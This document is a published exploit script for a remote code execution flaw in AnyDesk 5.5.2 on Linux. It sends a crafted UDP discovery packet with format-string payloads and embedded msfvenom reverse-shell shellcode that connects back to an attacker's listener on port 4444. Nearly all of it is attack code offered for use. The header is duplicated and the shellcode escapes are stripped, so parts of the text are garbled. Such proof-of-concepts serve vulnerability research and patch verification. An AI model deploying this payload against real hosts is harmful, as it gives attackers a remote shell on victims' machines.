# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881

#!/usr/bin/env python
import struct
import socket
import sys

ip = '192.168.x.x'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
d = chr(0x3e)+chr(0xd1)+chr(0x1)
d += struct.pack('>I', ad_id)
d += struct.pack('>I', 0)
d += chr(0x2)+chr(os)
d += struct.pack('>I', len(hn)) + hn
d += struct.pack('>I', len(user)) + user
d += struct.pack('>I', 0)
d += struct.pack('>I', len(inf)) + inf
d += chr(0)
d += struct.pack('>I', len(func)) + func
d += chr(0x2)+chr(0xc3)+chr(0x51)
return d

# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "x00x25x26" -f python -v shellcode
shellcode = b""
shellcode += b"x48x31xc9x48x81xe9xf6xffxffxffx48"
shellcode += b"x8dx05xefxffxffxffx48xbbxcbx46x40"
shellcode += b"x6cxedxa4xe0xfbx48x31x58x27x48x2d"
shellcode += b"xf8xffxffxffxe2xf4xa1x6fx18xf5x87"
shellcode += b"xa6xbfx91xcax18x4fx69xa5x33xa8x42"
shellcode += b"xc9x46x41xd1x2dx0cx96xf8x9ax0exc9"
shellcode += b"x8ax87xb4xbax91xe1x1ex4fx69x87xa7"
shellcode += b"xbexb3x34x88x2ax4dxb5xabxe5x8ex3d"
shellcode += b"x2cx7bx34x74xecx5bxd4xa9x2fx2ex43"
shellcode += b"x9exccxe0xa8x83xcfxa7x3exbaxecx69"
shellcode += b"x1dxc4x43x40x6cxedxa4xe0xfb"

print('sending payload ...')
p = gen_discover_packet(4919, 1, 'x85xfe%1$*1$x%18x%165$ln'+shellcode, 'x85xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')